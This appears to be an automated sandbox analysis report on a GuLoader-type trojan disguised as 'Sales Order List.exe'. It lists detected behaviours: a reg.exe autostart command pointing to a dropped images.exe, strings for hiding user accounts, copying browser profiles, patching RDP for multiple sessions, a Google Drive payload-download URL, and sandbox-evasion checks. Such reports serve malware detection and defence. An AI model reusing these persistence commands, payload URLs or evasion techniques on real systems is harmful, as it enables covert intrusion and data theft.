Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 4_2_016780F7 NtProtectVirtualMemory, 4_2_016780F7
Source: C:\ProgramData\images.exe Code function: 15_2_0233DBA3 NtAllocateVirtualMemory, 15_2_0233DBA3
Source: C:\ProgramData\images.exe Code function: 15_2_0233DBDF NtAllocateVirtualMemory, 15_2_0233DBDF
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\Sales Order List.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: Sales Order List.exe, 00000002.00000000.125342747784.0000000000426000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBandies.exe vs Sales Order List.exe
Source: Sales Order List.exe, 00000004.00000000.125542114197.0000000000426000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBandies.exe vs Sales Order List.exe
Source: Sales Order List.exe Binary or memory string: OriginalFilenameBandies.exe vs Sales Order List.exe
PE file contains strange resources
Source: Sales Order List.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Sales Order List.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: images.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: images.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\Sales Order List.exe Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\Sales Order List.exe Section loaded: edgegdi.dll
Source: C:\ProgramData\images.exe Section loaded: edgegdi.dll
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
Source: Sales Order List.exe ReversingLabs: Detection: 40%
Source: C:\Users\user\Desktop\Sales Order List.exe File read: C:\Users\user\Desktop\Sales Order List.exe
Source: Sales Order List.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Sales Order List.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Sales Order List.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\ProgramData\images.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Users\user\Desktop\Sales Order List.exe "C:\Users\user\Desktop\Sales Order List.exe"
Source: C:\Users\user\Desktop\Sales Order List.exe Process created: C:\Users\user\Desktop\Sales Order List.exe "C:\Users\user\Desktop\Sales Order List.exe"
Source: C:\Users\user\Desktop\Sales Order List.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
Source: C:\Users\user\Desktop\Sales Order List.exe Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
Source: C:\ProgramData\images.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 740
Source: C:\ProgramData\images.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 772
Source: C:\Users\user\Desktop\Sales Order List.exe Process created: C:\Users\user\Desktop\Sales Order List.exe "C:\Users\user\Desktop\Sales Order List.exe"
Source: C:\Users\user\Desktop\Sales Order List.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
Source: C:\Users\user\Desktop\Sales Order List.exe Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
Source: C:\Users\user\Desktop\Sales Order List.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\Sales Order List.exe File created: C:\Users\user\AppData\Local\Microsoft Vision\
Source: C:\Users\user\Desktop\Sales Order List.exe File created: C:\Users\user\AppData\Local\Temp\~DF052E41D7F13B5154.TMP
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@12/14@2/4
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4192
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:304:WilStaging_02
Source: C:\Users\user\Desktop\Sales Order List.exe File created: C:\Program Files\Microsoft DN1
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Sales Order List.exe Directory created: C:\Program Files\Microsoft DN1
Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126024539923.00000000068B8000.00000004.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdb( source: WerFault.exe, 00000014.00000003.125904782894.0000000005CEB000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126018047691.0000000006475000.00000004.00000001.sdmp
Source: Binary string: wgdi32full.pdb( source: WerFault.exe, 00000014.00000003.125904003059.0000000002DFC000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008791375.00000000033D5000.00000004.00000001.sdmp
Source: Binary string: coml2.pdb6H&8e source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.125899753643.0000000002D6E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009250720.000000000334B000.00000004.00000001.sdmp
Source: Binary string: ntmarta.pdb( source: WerFault.exe, 00000014.00000003.125910819500.0000000005D29000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126023579033.00000000068B2000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008890066.00000000033E0000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000014.00000003.125905933053.0000000005C3F000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126013564666.00000000033F7000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.125899753643.0000000002D6E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033173702.0000000005431000.00000004.00000001.sdmp
Source: Binary string: shcore.pdb$H48s source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp
Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000014.00000003.125913249873.0000000005D18000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126017165802.000000000649F000.00000004.00000001.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb( source: WerFault.exe, 00000014.00000003.125903738538.0000000002D80000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009354250.0000000003358000.00000004.00000001.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.125905520713.0000000002DF6000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033269253.0000000005520000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb( source: WerFault.exe, 00000014.00000003.125909078051.0000000005CE0000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126012936139.000000000646A000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126010636897.00000000033E6000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb( source: WerFault.exe, 00000014.00000003.125905831080.0000000005C34000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008890066.00000000033E0000.00000004.00000001.sdmp
Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000014.00000003.125910819500.0000000005D29000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126023579033.00000000068B2000.00000004.00000001.sdmp
Source: Binary string: coml2.pdb( source: WerFault.exe, 00000017.00000003.126018806279.000000000648C000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008843786.00000000033DB000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb( source: WerFault.exe, 00000014.00000003.125904733671.0000000005CE6000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016753163.0000000006470000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.125900100057.0000000002D6E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009302903.0000000003351000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.125904733671.0000000005CE6000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016753163.0000000006470000.00000004.00000001.sdmp
Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000014.00000003.125915266650.0000000005D13000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126022235396.0000000006499000.00000004.00000001.sdmp
Source: Binary string: TextShaping.pdb source: WerFault.exe, 00000014.00000003.125917002362.0000000006562000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009302903.0000000003351000.00000004.00000001.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.125927969397.0000000005260000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008696474.00000000033CA000.00000004.00000001.sdmp
Source: Binary string: oleaut32.pdbQ source: WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
Source: Binary string: CoreMessaging.pdb( source: WerFault.exe, 00000014.00000003.125913249873.0000000005D18000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126017165802.000000000649F000.00000004.00000001.sdmp
Source: Binary string: sxs.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb( source: WerFault.exe, 00000014.00000003.125909199577.0000000005CF1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016848001.000000000647B000.00000004.00000001.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126019837993.000000000613C000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb( source: WerFault.exe, 00000014.00000003.125905988617.0000000005C45000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010047688.00000000033F1000.00000004.00000001.sdmp
Source: Binary string: combase.pdb( source: WerFault.exe, 00000014.00000003.125907854720.0000000002E1D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010408748.00000000060E2000.00000004.00000001.sdmp
Source: Binary string: CoreUIComponents.pdb( source: WerFault.exe, 00000014.00000003.125915266650.0000000005D13000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126022235396.0000000006499000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000014.00000003.125899753643.0000000002D6E000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb( source: WerFault.exe, 00000014.00000003.125905933053.0000000005C3F000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000014.00000003.125917746027.0000000005D1E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb( source: WerFault.exe, 00000014.00000003.125907125589.0000000005C3A000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010636897.00000000033E6000.00000004.00000001.sdmp
Source: Binary string: coml2.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126018806279.000000000648C000.00000004.00000001.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008791375.00000000033D5000.00000004.00000001.sdmp
Source: Binary string: WinTypes.pdb( source: WerFault.exe, 00000017.00000003.126024539923.00000000068B8000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126010047688.00000000033F1000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb8H 8 source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb( source: WerFault.exe, 00000017.00000003.126013564666.00000000033F7000.00000004.00000001.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126021040208.0000000006486000.00000004.00000001.sdmp
Source: Binary string: ,wntdll.pdb source: WerFault.exe, 00000014.00000003.125899412774.0000000002D70000.00000004.00000001.sdmp
Source: Binary string: wwin32u.pdb( source: WerFault.exe, 00000017.00000003.126008696474.00000000033CA000.00000004.00000001.sdmp
Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000014.00000003.125910630742.0000000005D0D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126022159017.0000000006493000.00000004.00000001.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126018047691.0000000006475000.00000004.00000001.sdmp
Source: Binary string: TextShaping.pdb( source: WerFault.exe, 00000014.00000003.125917002362.0000000006562000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126023187158.00000000068BD000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb( source: WerFault.exe, 00000014.00000003.125917746027.0000000005D1E000.00000004.00000001.sdmp
Source: Binary string: wUxTheme.pdb( source: WerFault.exe, 00000017.00000003.126019837993.000000000613C000.00000004.00000001.sdmp
Source: Binary string: wgdi32.pdb( source: WerFault.exe, 00000014.00000003.125905520713.0000000002DF6000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000014.00000003.125909199577.0000000005CF1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016848001.000000000647B000.00000004.00000001.sdmp
Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Sales Order List.exe, 00000004.00000003.125766201878.000000001F5C1000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.125849081972.000000000EA70000.00000040.00000001.sdmp
Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Sales Order List.exe, 00000004.00000003.125766201878.000000001F5C1000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.125849081972.000000000EA70000.00000040.00000001.sdmp
Source: Binary string: msctf.pdb( source: WerFault.exe, 00000014.00000003.125910562779.0000000005D02000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126021040208.0000000006486000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000014.00000003.125903704223.0000000002D7B000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009302903.0000000003351000.00000004.00000001.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000014.00000003.125907854720.0000000002E1D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010408748.00000000060E2000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb( source: WerFault.exe, 00000014.00000003.125905424783.0000000002DEB000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008630763.00000000033C4000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000014.00000003.125903667098.0000000002D75000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009250720.000000000334B000.00000004.00000001.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126012936139.000000000646A000.00000004.00000001.sdmp
Source: Binary string: coml2.pdb} source: WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
Source: Binary string: TextInputFramework.pdb( source: WerFault.exe, 00000014.00000003.125910630742.0000000005D0D000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.125927969397.0000000005260000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126009354250.0000000003358000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.125905424783.0000000002DEB000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008630763.00000000033C4000.00000004.00000001.sdmp
Source: Binary string: ole32.pdb( source: WerFault.exe, 00000014.00000003.125907817675.0000000002E17000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb( source: WerFault.exe, 00000014.00000003.125904042199.0000000002E01000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008843786.00000000033DB000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000002.00000002.125547203981.00000000022E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.125996962988.0000000002330000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.125886367131.0000000002330000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.125545111088.0000000001660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.125990940523.0000000002330000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.125891818807.0000000002330000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.126072449802.0000000002330000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_00404402 pushfd ; retf 2_2_0040441F
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_00403827 push es; ret 2_2_00403829
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_004044E6 pushfd ; retf 2_2_004044E7
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_0040A880 pushfd ; ret 2_2_0040A894
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_0040A101 push edx; retf 2_2_0040A10A
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_00404585 pushfd ; retf 2_2_00404597
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_0040459A pushfd ; retf 2_2_004045AB
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_004051BF push dword ptr [esi]; iretd 2_2_004051C6
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_0040665E pushfd ; retf 2_2_0040665F
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_0040427A pushfd ; retf 2_2_0040427B
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_004062C2 pushfd ; retf 2_2_004062C3
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_0040A6C2 push ebx; retf 2_2_0040A6CA
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_004072E2 pushfd ; retf 2_2_0040730F
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_0040434A pushfd ; retf 2_2_0040434B
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_00404336 pushfd ; retf 2_2_00404347
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_0040633E pushfd ; retf 2_2_0040634B
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_004067DF pushfd ; retf 2_2_004067E7
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E1E3D pushad ; retn EE2Ch 2_2_022E1D75
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED671 push 1D9AA5CFh; iretd 2_2_022ED765
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E1698 push ebx; retn F070h 2_2_022E183E
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E3D31 push ebp; retf 67B7h 2_2_022E5122
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E1AD3 pushad ; retn EE2Ch 2_2_022E1D75
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E9B0B push ebp; retf 2_2_022E9B0C
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E5FF4 push esp; iretd 2_2_022E5FF5
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EC7CD push 1D6C9AC2h; retn 6C9Ah 2_2_022ECC4A
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED414 push 3A04CBC7h; retf 2_2_022ED629
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E0012 push AE35C959h; retf 2_2_022E001E
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E6479 push esp; iretd 2_2_022E66CA
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E24F2 push 812B1A06h; ret 2_2_022E24FD
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E2D33 push ebp; retf 57CCh 2_2_022E2E80
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EDD13 push 708CCF4Eh; iretd 2_2_022EDF11

Persistence and Installation Behavior:

Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\Sales Order List.exe File created: C:\ProgramData\images.exe
Drops PE files
Source: C:\Users\user\Desktop\Sales Order List.exe File created: C:\ProgramData\images.exe

Boot Survival:

Creates an undocumented autostart registry key
Source: C:\Windows\SysWOW64\reg.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Load

Hooking and other Techniques for Hiding and Protection:

Contains functionality to hide user accounts
Source: Sales Order List.exe, 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: Sales Order List.exe, 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\Sales Order List.exe File opened: C:\ProgramData\images.exe:Zone.Identifier read attributes | delete
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\Sales Order List.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\Sales Order List.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\user\Desktop\Sales Order List.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\Sales Order List.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Sales Order List.exe, 00000002.00000002.125548712664.00000000053D0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL
Source: Sales Order List.exe, 00000002.00000002.125548712664.00000000053D0000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877417935.0000000003310000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Sales Order List.exe, 00000004.00000002.125877417935.0000000003310000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=14RIMS-BY6HJEY7HTTEKF9CX7RHIUCVVN
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Sales Order List.exe TID: 7532 Thread sleep count: 70 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F3AA0 rdtsc 2_2_022F3AA0
Contains functionality to detect virtual machines (SLDT)
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 4_3_018A1329 sldt word ptr [eax] 4_3_018A1329
Source: C:\Users\user\Desktop\Sales Order List.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Sales Order List.exe System information queried: ModuleInformation
